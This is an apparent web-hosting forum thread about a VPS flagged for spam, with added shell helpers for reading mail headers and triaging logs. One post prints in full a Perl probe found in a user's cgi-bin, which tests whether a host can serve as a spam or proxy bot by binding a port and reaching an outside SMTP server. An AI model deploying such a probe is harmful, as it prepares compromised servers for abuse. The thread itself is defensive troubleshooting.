spam sending from my email

ViruSzZ

Hi there,

I'm having issues with spam email messages being sent from my CentOS 5 VPS with DA installed on it.

Actually, it is weird to me because there is nothing wrong on the VPS. The email I got from SpamCop has the following email headers:

Code:
1. Received: from my.vps-hostname.com (my.vps-hostname.com [XXX.XXX.XXX.XXX])
by homiemail-mx21.g.dreamhost.com (Postfix) with SMTP id 26F986D89F5

2. Received: from caibbdcaaaaf.dreamhost.com (HELO homiemail-mx21.g.dreamhost.com) (208.113.200.5)
by mxin2.cesmail.net with SMTP; 13 Jul 2012 21:12:00 -0000

3. Received: from unknown (192.168.1.86)
by filter7.cesmail.net with QMQP; 13 Jul 2012 21:09:28 -0000

4. Received: from unknown (HELO filter7.cesmail.net) ([192.168.1.217])
by c60.cesmail.net with SMTP; 13 Jul 2012 17:09:36 -0400

5. Received: from c60.cesmail.net (c60.cesmail.net [216.154.195.49])
(using TLSv1 with cipher RC4-SHA (128/128 bits))
(No client certificate requested)
by homiemail-mx22.g.dreamhost.com (Postfix) with ESMTPS id C90CF200F11

Then I came across the following URL http://www.spamcop.net/fom-serve/cache/385.html and I scanned my VPS using rkhunter and maldetect, and everything was OK.

In the email from SpamCop they're saying that my server's IP is an open proxy and that's how the emails were sent, but I do not have such a proxy on my VPS and am a little confused regarding this.

So can someone shed some light on this for me? How am I supposed to track down and fix this issue?

Thank you.
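The Received: headers quoted in the post are read from the bottom up: the lowest header is the first hop, the one the originating host made, and each header above it was added by the next relay. The following shell helper is an added example, not code from the thread; it unfolds a message's headers and prints the hops in travel order. The headers it parses are constructed samples with documentation-range hostnames and addresses, laid out like the two hops that matter in a SpamCop report (the hop that left the VPS and the relay that accepted it).

```shell
#!/bin/sh
# Added example (not from the original thread): walk the Received: chain of a
# message from the earliest hop to the latest, i.e. the order the mail travelled.

# Constructed sample headers: hypothetical hosts and documentation-range IPs,
# not the addresses from the post. Continuation lines are indented (folded).
HEADERS='Received: from mx1.example.org (mx1.example.org [203.0.113.5])
    by mxin.example.net with ESMTPS id 7A2B9
Received: from vps.example.com (vps.example.com [192.0.2.10])
    by mx1.example.org (Postfix) with SMTP id 26F986D89F5'

# Unfold folded header lines, keep only Received: headers and print them oldest
# hop first as: hop N: from=<claimed host> ip=<address the relay saw> by=<relay> with=<protocol>
received_hops() {
    printf '%s\n' "$1" | awk '
        /^[ \t]/ { sub(/^[ \t]+/, ""); buf = buf " " $0; next }  # folded continuation
        { if (buf != "") lines[n++] = buf; buf = $0 }
        END {
            if (buf != "") lines[n++] = buf
            hop = 0
            for (i = n - 1; i >= 0; i--) {                  # bottom header = first hop
                l = lines[i]
                if (l !~ /^Received:/) continue
                hop++
                from = ""; ip = ""; by = ""; proto = ""
                if (match(l, /from [^ ]+/))   from  = substr(l, RSTART + 5, RLENGTH - 5)
                if (match(l, /\[[0-9.]+\]/))  ip    = substr(l, RSTART + 1, RLENGTH - 2)
                if (match(l, /by [^ ]+/))     by    = substr(l, RSTART + 3, RLENGTH - 3)
                if (match(l, /with [^ ]+/))   proto = substr(l, RSTART + 5, RLENGTH - 5)
                printf "hop %d: from=%s ip=%s by=%s with=%s\n", hop, from, ip, by, proto
            }
        }'
}

received_hops "$HEADERS"
```

Two fields are worth reading on the hop that left the VPS: the bracketed IP is what the receiving relay saw on the wire (the `from` name is only what the client claimed), and the protocol token tells how the client greeted. Postfix writes `with SMTP` when the client sent HELO and `with ESMTP` when it sent EHLO; a full MTA almost always uses EHLO, while a script speaking SMTP by hand, like the probe posted later in this thread, typically does not.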
 
To follow up on this:

I found this Perl script in one user's public_html/cgi-bin/2613231580.pl

Code:
#!/usr/bin/perl -w

# Dropped "environment probe": it checks that the host has the Perl modules a
# spam/proxy bot needs, can bind a listening port, and can reach a remote mail
# server on port 25. It sends nothing itself; it only reports readiness.

$| = 1;

# Only emit a CGI header when invoked through the web server.
print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

print "System info\n";
print "-----------\n\n";
print "$^O";
print "\n", `uname -a` if $^O !~ /win/i;
print "\n\n";

# Module checks: each string eval tries to load one module and reports Ok/Error.
print "Perl modules\n";
print "------------\n\n";
print "strict .......................... ";
unless (eval ("use strict; return 1;")) { print "Error"; } else { print "Ok"; }
print "\nSys::Hostname ................... ";
unless (eval ("use Sys::Hostname; return 1;")) { print "Error"; } else { print "Ok"; }
print "\nPOSIX ........................... ";
unless (eval ("use POSIX qw(setsid); return 1;")) { print "Error"; } else { print "Ok"; }
print "\nErrno ........................... ";
unless (eval ("use Errno qw(EINPROGRESS); return 1;")) { print "Error"; } else { print "Ok"; }
print "\nIO::Socket ...................... ";
unless (eval ("use IO::Socket qw(:DEFAULT :crlf); return 1;")) { print "Error"; } else { use IO::Socket qw(:DEFAULT :crlf); print "Ok"; }
print "\nIO::Select ...................... ";
unless (eval ("use IO::Select; return 1;")) { print "Error"; } else { print "Ok"; }
print "\n\n";

# Server test: can this process bind and listen on TCP port 36000?
print "Server test\n";
print "-----------\n\n";
my $s = IO::Socket::INET->new(Proto => "tcp", LocalPort => 36000, Listen => SOMAXCONN, Reuse => 1);
unless ($s) { print "Error"; } else { close $s; print "Ok"; }
print "\n\n";

# Client test: resolve smtp.mail.ru, open a raw TCP connection to port 25 using a
# hand-packed sockaddr_in (family 2 = AF_INET, port 25, 4-byte address, 8 bytes
# of padding) and read the SMTP banner. Success means outbound port 25 is open.
print "Client test\n";
print "-----------\n\n";
my $r = (gethostbyname "smtp.mail.ru")[4];
unless ($r) { print "Error > Can't resolve hostname"; exit; }
$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
unless ($s) { print "Error > Can't create socket > $!"; exit; }
unless ($s->connect(pack ("Sna4x8", 2, 25, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
$r = <$s>; close $s;
if (length $r) { print "Ok\n$r"; } else { print "Error > Can't read response"; }

I moved it, fixed the permissions on the public_html/ directory and the files within it, and disabled CGI/Perl.

Also, I got warnings about malware on the user's site.

HTML/Iframe.B.Gen virus => http://www.eset.eu/virus/html-iframe-b-gen

Any tips on what would be best to do next? Look through and clean the system, or simply wipe it out?
 
If you have a user account infected with iframe stuff, it's probably some lines in the index file.
This can be caused by "home made" scripts, or the site can be hacked because the software version is too old, like old and insecure Joomla or WordPress versions or plugins.

In that case, remove the iframe lines or remove the complete index file.
Change the user's FTP passwords, but don't mail them to him. Let him first make sure he has an up-to-date virus scanner on his PC, and let him scan with the virus scanner and Malwarebytes.

If all online software is up to date and the PC is clean, send him the new passwords and things should probably be fine.

You can also check your logs to see if you can find which IP uploaded the .pl script, and block it.
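As an added example (not code from the thread), the helpers below cover both the clean-up question in the follow-up post and the reply's suggestion to check the logs for the uploading IP: they pull the uploader of a named file out of an FTP transfer log, list which clients then requested it over HTTP, find recently modified .pl/.cgi files under a web root, and check whether anything is listening on the port the dropped probe tested. The log lines are constructed samples in standard xferlog and Apache combined formats, using documentation-range IPs; only the file name 2613231580.pl is taken from the thread.

```shell
#!/bin/sh
# Added example (not from the original thread): triage helpers for a shared-hosting
# box after a dropped CGI script is found. All log data below is constructed.

# Constructed xferlog lines (ProFTPD/Pure-FTPd format). Field 7 is the remote host,
# field 9 the file name, field 12 the direction: i = upload to server, o = download.
XFERLOG='Fri Jul 13 20:55:01 2012 1 203.0.113.45 1207 /home/user1/domains/example.com/public_html/cgi-bin/2613231580.pl b _ i r user1 ftp 0 * c
Fri Jul 13 20:56:12 2012 1 203.0.113.45 812 /home/user1/domains/example.com/public_html/index.html b _ i r user1 ftp 0 * c
Fri Jul 13 20:58:40 2012 1 198.51.100.7 812 /home/user1/domains/example.com/public_html/index.html b _ o r user1 ftp 0 * c'

# Constructed Apache combined-format access log lines for the same site.
ACCESSLOG='203.0.113.45 - - [13/Jul/2012:21:01:03 +0000] "GET /cgi-bin/2613231580.pl HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jul/2012:21:02:44 +0000] "GET /index.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.45 - - [13/Jul/2012:21:05:10 +0000] "POST /cgi-bin/2613231580.pl HTTP/1.1" 200 77 "-" "curl/7.19.7"'

# Remote IPs that uploaded a file whose path contains $1; xferlog text on stdin.
uploader_ips() {
    awk -v name="$1" '$12 == "i" && index($9, name) > 0 { print $7 }' | sort -u
}

# Client IPs that requested a path containing $1 over HTTP; access log on stdin.
# Whoever calls a freshly dropped CGI script is usually its owner.
requester_ips() {
    awk -v name="$1" 'index($7, name) > 0 { print $1 }' | sort -u
}

# .pl/.cgi files under $1 modified within the last $2 days. Dropped scripts are
# normally much newer than the site around them, so a short window isolates them.
recent_cgi() {
    find "$1" -type f \( -name '*.pl' -o -name '*.cgi' \) -mtime "-$2" 2>/dev/null | sort
}

# Print 1 if something is listening on TCP port $1, else 0. The probe script in the
# thread tests whether it can bind 36000; a live listener there means more than the
# probe was installed. Uses ss when present, otherwise netstat (column 4 is the
# local address:port in both).
port_listening() {
    if command -v ss >/dev/null 2>&1; then
        ss -ltn 2>/dev/null | awk -v p=":$1" '$4 ~ p "$" { found = 1 } END { print found + 0 }'
    else
        netstat -ltn 2>/dev/null | awk -v p=":$1" '$4 ~ p "$" { found = 1 } END { print found + 0 }'
    fi
}

# Usage against the constructed samples; on a real box, feed the actual logs:
#   uploader_ips 2613231580.pl < /var/log/xferlog
#   requester_ips 2613231580.pl < /var/log/httpd/domains/example.com.log
printf '%s\n' "$XFERLOG" | uploader_ips 2613231580.pl
printf '%s\n' "$ACCESSLOG" | requester_ips 2613231580.pl
```

The FTP and HTTP views should agree: the IP that uploaded the script and the IP that first requested it are the same client in the sample, and that is the address to block and to search for across every other account on the server, since a credential stolen from one user's PC is rarely the only one the same operator holds.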
 